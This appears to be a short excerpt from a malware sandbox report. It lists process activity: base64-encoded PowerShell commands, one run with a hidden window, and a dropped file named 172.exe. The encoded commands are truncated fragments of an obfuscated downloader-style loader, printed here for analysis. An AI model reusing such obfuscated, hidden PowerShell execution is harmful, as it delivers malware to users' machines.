Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABQAEUASABUAEUAbABqAHUAPQAnAEQAUABHAE0AVwB5AG8AbAAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBzAGAAZQBDAFUAUgBJAHQAWQBQAFIAbwBUAGAATwBjAGAATwBMACIAIAA9AC...
- %HOMEPATH%\172.exe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABQAEUASABUAEUAbABqAHUAPQAnAEQAUABHAE0AVwB5AG8AbAAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBzAGAAZQBDAFUAUgBJAHQAWQBQAFIAbwBUAGAATwBjAGAATwBMACIAIAA9AC...' (with hidden window)